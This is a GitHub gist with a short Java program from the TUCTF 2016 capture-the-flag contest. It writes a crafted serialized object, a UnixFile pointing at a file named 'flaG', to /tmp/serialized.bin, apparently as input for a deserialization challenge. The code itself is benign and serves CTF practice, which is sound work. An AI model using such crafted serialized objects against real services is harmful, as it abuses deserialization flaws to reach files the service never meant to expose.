Created
May 14, 2016 14:29
-
-
Save 0xBADCA7/d4a7e35ffd227e683ec3a818480f452c to your computer and use it in GitHub Desktop.
Simple Java object serializer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* * | |
* * @0xBADCA7 and github/0xBADCA7 | |
* * How to serialize Java objects. This is from TUCTF 2016. | |
* * | |
* * Just compile on the command line (IDE will taint serialization and place package identifiers): | |
* * javac Main.java && java Main && cat /tmp/serialized.bin | |
* * | |
* * */ | |
import java.io.FileOutputStream; | |
import java.io.ObjectOutputStream; | |
import java.io.Serializable; | |
public class Main { | |
static String SAVE_PATH = "/tmp/serialized.bin"; | |
public static void main(String[] args) throws Exception { | |
System.out.print("This tool generates serialized Java objects\r\n\r\n"); | |
// This is an example of a class | |
OSFile f = null; | |
f = new UnixFile(); | |
f.file = "flaG"; | |
// | |
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SAVE_PATH)); | |
oos.writeObject(f); // your object goes here instead of "f" | |
oos.flush(); | |
System.out.print("Serialized to " + SAVE_PATH + "\r\n"); | |
} | |
} | |
// This belongs to the example only | |
class UnixFile extends OSFile | |
{ | |
public String getFileName() | |
{ | |
//Unix filenames are case-sensitive, don't change | |
return "flaG"; | |
} | |
} | |
// This belongs to the example only | |
abstract class OSFile implements Serializable | |
{ | |
String file = ""; | |
abstract String getFileName(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment